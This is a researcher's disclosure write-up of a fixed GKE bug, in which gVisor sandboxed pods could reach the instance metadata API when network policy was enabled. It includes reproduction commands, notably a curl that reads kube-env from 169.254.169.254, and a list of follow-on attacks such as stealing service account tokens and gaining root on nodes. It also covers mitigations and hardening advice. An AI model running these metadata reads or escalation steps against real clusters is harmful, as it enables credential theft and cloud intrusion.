Escaping GKE gVisor sandboxing using metadata
Introduction
GKE is a Google Cloud service that offers managed Kubernetes clusters. The cluster nodes run on Google Cloud VM instances, while the control plane and network are fully managed by GKE.
GKE offers a sandboxing feature (https://cloud.google.com/kubernetes-engine/docs/concepts/sandbox-pods) based on gVisor (https://gvisor.dev/docs/) that protects the host kernel from untrusted code. This sandboxing offers very good isolation and allows SaaS businesses to execute unknown code submitted by their users.
I tried to use this feature to run isolated workloads and found that the isolation was not entirely effective: under certain conditions, access to the metadata API was possible.
Network isolation using network policy
By default, all pods in a Kubernetes cluster are able to communicate with each other. GKE recommends using Network Policy to restrict the network traffic between pods (https://cloud.google.com/kubernetes-engine/docs/how-to/hardening-your-cluster#restrict_with_network_policy).
When running untrusted code, it is a good practice to isolate your clients from each other and from your own services.
With this feature, it is easy to define a policy, attach it to a group of pods, and restrict the network access for these pods.
Sandbox metadata protection
The Google Cloud team documents how to harden workload isolation using GKE Sandbox (https://cloud.google.com/kubernetes-engine/docs/how-to/sandbox-pods#sandboxed-application), and gives some hints on how to configure and test access to the metadata.
To validate that the filtering is properly enabled, you can launch a new pod and run the following command:
curl -s "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env" -H "Metadata-Flavor: Google"
This command fails, as described in the documentation, because a filter denies access to the metadata API.
By default, the instance metadata API server is not supposed to be accessible from any sandboxed pod.
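The same check can be scripted so that it runs as part of a pod smoke test. The following is only a minimal sketch, assuming Python 3 is available in the pod image. The URL and header come from the curl command above; the function name `metadata_is_reachable` and its `opener` parameter are hypothetical names introduced for illustration.

```python
import urllib.error
import urllib.request

# URL and header are taken from the curl command above.
METADATA_URL = (
    "http://metadata.google.internal/computeMetadata/v1/"
    "instance/attributes/kube-env"
)


def metadata_is_reachable(url=METADATA_URL, timeout=3.0,
                          opener=urllib.request.urlopen):
    """Return True if the metadata API answers with HTTP 200, False otherwise.

    `opener` is a hypothetical injection point so the check can be exercised
    without a real metadata server.
    """
    request = urllib.request.Request(url, headers={"Metadata-Flavor": "Google"})
    try:
        with opener(request, timeout=timeout) as response:
            return response.status == 200
    except (urllib.error.URLError, OSError):
        # HTTP errors, DNS failures, refused connections and timeouts all end
        # up here; this is the expected outcome when the filtering is active.
        return False
```

Inside a sandboxed pod, calling `metadata_is_reachable()` is expected to return `False` when the filtering works; a `True` result means the pod can read `kube-env`.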
Bug found
When testing the network isolation for untrusted pods, I tried to configure the network policy on the cluster and applied some network filtering rules for the pods that I wanted to isolate.
After more testing, I found that I was able to query the metadata API. It appears that the network filtering applied by the GKE team to gVisor sandboxed pods was entirely disabled when network policy was activated.
Since this sandboxing feature is supposed to run untrusted code, this would give an attacker access to sensitive information about the node, project and Kubernetes cluster.
The bug was reported to the VRP team and quickly fixed. I was also able to mitigate it by manually filtering the 169.254.169.254 IP in the network policy applied to these pods.
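To illustrate that mitigation, here is a rough sketch that builds a NetworkPolicy manifest allowing egress everywhere except the metadata server address. It is not the exact policy I applied: the policy name, namespace and labels are placeholders, and the helper names `metadata_block_policy` and `render` are hypothetical. The manifest is emitted as JSON, which kubectl accepts in place of YAML.

```python
import json

# Address of the instance metadata server, as used in this article.
METADATA_SERVER_CIDR = "169.254.169.254/32"


def metadata_block_policy(name, namespace, pod_labels):
    """Build a NetworkPolicy allowing all egress except the metadata IP."""
    return {
        "apiVersion": "networking.k8s.io/v1",
        "kind": "NetworkPolicy",
        "metadata": {"name": name, "namespace": namespace},
        "spec": {
            # Pods carrying these labels are the ones being restricted.
            "podSelector": {"matchLabels": dict(pod_labels)},
            "policyTypes": ["Egress"],
            "egress": [
                {
                    "to": [
                        {
                            "ipBlock": {
                                "cidr": "0.0.0.0/0",
                                "except": [METADATA_SERVER_CIDR],
                            }
                        }
                    ]
                }
            ],
        },
    }


def render(policy):
    """Serialize the manifest to JSON text."""
    return json.dumps(policy, indent=2)
```

For example, the output of `render(metadata_block_policy("deny-metadata", "default", {"app": "fedora"}))` can be saved to a file and applied with `kubectl apply -f`. Allowing `0.0.0.0/0` is deliberately permissive here so that the only thing shown is the exception for the metadata address; a real policy for untrusted code should be much stricter.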
How to reproduce
You can follow the steps here: https://cloud.google.com/kubernetes-engine/docs/how-to/sandbox-pods
- Create a new cluster with network policy enabled
gcloud container clusters create cluster-name --enable-network-policy
- Create a new gVisor pool
gcloud container node-pools create gvisor \
  --cluster=cluster-name \
  --node-version=1.16.13-gke.401 \
  --machine-type=e2-standard-2 \
  --image-type=cos_containerd \
  --sandbox type=gvisor \
  --zone europe-west1-c
- Apply the test configuration from the documentation
# sandbox-metadata-test.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: fedora
  labels:
    app: fedora
spec:
  replicas: 1
  selector:
    matchLabels:
      app: fedora
  template:
    metadata:
      labels:
        app: fedora
    spec:
      runtimeClassName: gvisor
      containers:
      - name: fedora
        image: fedora
        command: ['/bin/sleep', '10000']
- Launch a shell
kubectl exec -it pod-name -- /bin/sh
- Enjoy full access to the metadata API
curl "http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env" -H "Metadata-Flavor: Google"
...
ALLOCATE_NODE_CIDRS: "true"
API_SERVER_TEST_LOG_LEVEL: --v=3
...
Going deeper
With this metadata exposure bug, an attacker may gain access to sensitive information about the node, project and Kubernetes cluster.
Depending on the configuration, this could allow an attacker to:
- read the project ID
- read public SSH keys
- get node information (name, IP, ...)
- add their own SSH key and gain root access on the node
- get the Kubernetes configuration and certificate
- access the Kubernetes cluster
- impersonate a Kubernetes node
- retrieve a service account token
- access / create / edit / delete project resources
Better isolation of untrusted code in GKE
Even when the isolation is working properly, you have many ways to protect yourself against this kind of metadata exposure.
A few recommendations for running untrusted code in GKE:
- Always double check that the network policy is properly applied
- Filter out all internal ranges and allow only the destinations that are required
- gVisor is fine but may be tricky to configure in Kubernetes; double check using dmesg that you are running inside the sandbox
- Do not use default identities for instance identity
- You can use multiple projects to isolate workload / clients
- Do not use cluster DNS
- Create specific node pool for untrusted code
- Use workload identity https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity
- Use metadata concealment https://cloud.google.com/kubernetes-engine/docs/how-to/protecting-cluster-metadata#concealment
- Use shielded GKE nodes https://cloud.google.com/kubernetes-engine/docs/how-to/shielded-gke-nodes
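The "filter out all internal ranges" rule from the list above can be modelled in a few lines, which is handy for auditing an egress allowlist before turning it into a network policy. This is only a sketch of the decision logic, not an enforcement mechanism. The list of internal ranges is my assumption (the RFC 1918 private blocks plus the link-local block that contains 169.254.169.254), and the name `egress_allowed` is hypothetical.

```python
import ipaddress

# Assumed set of "internal" ranges: RFC 1918 private blocks plus the
# link-local block that contains the metadata server address.
INTERNAL_RANGES = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("169.254.0.0/16"),
]


def egress_allowed(destination, allowlist=()):
    """Return True if traffic to `destination` should be allowed.

    Internal destinations are denied unless they fall inside one of the
    explicitly allowlisted CIDRs.
    """
    address = ipaddress.ip_address(destination)
    if any(address in ipaddress.ip_network(cidr) for cidr in allowlist):
        return True
    return not any(address in network for network in INTERNAL_RANGES)
```

With an empty allowlist, `egress_allowed("169.254.169.254")` and `egress_allowed("10.0.0.5")` are both denied, while a public address such as `8.8.8.8` is allowed. Passing `allowlist=["10.0.0.0/24"]` re-opens only that specific internal range.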